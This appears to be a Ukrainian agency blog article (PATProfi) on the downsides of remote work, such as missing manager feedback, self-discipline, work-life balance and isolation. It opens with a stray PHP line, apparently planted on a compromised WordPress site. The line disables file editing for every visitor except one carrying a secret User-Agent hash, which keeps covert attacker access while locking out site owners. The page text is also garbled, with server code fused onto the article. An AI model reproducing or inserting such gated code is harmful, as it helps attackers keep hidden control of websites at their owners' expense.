if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Чим небезпечна дистанційна робота у Києві, Україні за доступними цінами від агентства PATProfi

Чим небезпечна дистанційна робота

Дистанційна робота багатьом здається мрією: не потрібно витрачати час на дорогу до офісу, гроші – на строгий одяг, а нерви – на спілкування з настирливими колегами. Однак дистанційна робота може таїти безліч пасток, у які потрапляють співробітники, що працюють вдома. Чи означає це, що для ефективної діяльності необхідно приїжджати в офіс і тільки туди? Зовсім ні, просто потрібно навчитися їх уникати.

Слід зазначити, що не можна плутати дистанційну роботу і фріланс. Фрілансери працюють за конкретними проектами і замовленнями, які у  більшості випадків шукають самі, не отримують фіксований оклад, а також не влаштовуються по трудовому законодавству. Якщо ж ви працюєте в штаті компанії, але у вашій присутності в офісі немає необхідності, то ви отримуєте всі гарантії і способи компенсації, як і ваші колеги, але робите це у себе вдома. У цьому матеріалі ми не розглядаємо особливості роботи фрілансерів – йдеться про роботу у «домашньому» форматі в цілому.

Відсутність зворотного зв’язку з керівником

Хтось бачить в цьому навіть перевагу: чим менше спілкуєшся з керівництвом, тим менше стресів. Однак відсутність зворотного зв’язку (а дистанційно підтримувати його все одно складніше) не дає вам зрозуміти, що ви робите добре, а над чим потрібно попрацювати. Звідси проблеми з кар’єрним і професійним розвитком і можливі помилки. І якщо когось потрібно рекомендувати на підвищення, навряд чи це буде дистанційний співробітник – запаморочливого кар’єрного росту можна не чекати. Що робити у такій ситуації? Якщо вам потрібна стабільна спокійна оплачувана робота, а не можливість перестрибувати по сходинках кар’єрної драбини, то ставтеся до цього спокійно. До речі, часто дистанційну роботу розглядають студенти, молоді мами і інші категорії працівників, пріоритети яких в даний час зміщено в іншому напрямку.

Особливості самодисципліни

Багато дистанційних співробітників одягаються на роботу вдома так само, як і в офіс. І це правильно – робота «у капцях» може розслабити вас настільки, що ви втрачаєте мотивацію стежити за собою. Певний дрес-код допомагає вам зосередитися і зібратися, навіть якщо його ніхто не бачить, крім вас. Крім того, вам необхідно обладнати робоче місце так, щоб якомога менше речей відволікали від справ. Якщо офіс мобілізує сам по собі, то затишок вашої квартири може стати причиною виконання роботи відразу перед дедлайном,  тобто в останні хвилини. Також ми радимо вам вивчити книги з тайм-менеджменту і самоорганізації – багато порад можуть стати в нагоді дистанційним співробітникам.

Порушення балансу роботи і відпочинку

Здається, що фрілансери і віддалені співробітники менше витрачають часу на дорогу, а отже, можуть більше відпочивати. Однак це міф. Насправді, якщо офісні співробітники після закінчення робочого дня можуть з чистою совістю йти додому, то у їх дистанційних колег такої можливості немає. Вам необхідно чітко планувати свій день, оскільки ваш єдиний показник роботи – це готовий результат. Якщо вам не вдається викроїти вільний час або вихідні, значить, ви або стикаєтеся з дуже великими обсягами роботи, або працюєте неефективно.

Робота і сім’я

Незважаючи на зростаючу популярність дистанційної роботи і розвиток технологій, близьким буває досить складно пояснити, що якщо член їх сім’ї сидить за комп’ютером, це означає, що його не можна турбувати, оскільки він закінчує важливий проект. Саме тому багато співробітників вважають за краще працювати у кафе або користуватися коворкінгом. Крім того, ви можете відчути відсутність соціального життя: деякі дистанційні співробітники скаржаться, що починають через деякий час сприймати похід в магазин як світський захід.

Рішення тут тільки одне – підтримувати контакти з друзями і не ставати відлюдником, навіть якщо це ваша зона комфорту. До речі, ви можете домовитися про участь у нарадах, наприклад, раз на тиждень. Беріть участь в житті колег, в рішенні колективних завдань, в проектах – це допоможе вашому професійному зростанні. Крім того, це вирішить проблему і з кар’єрним просуванням – складно розраховувати на підвищення, якщо керівник навряд чи впізнає вас на вулиці.

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.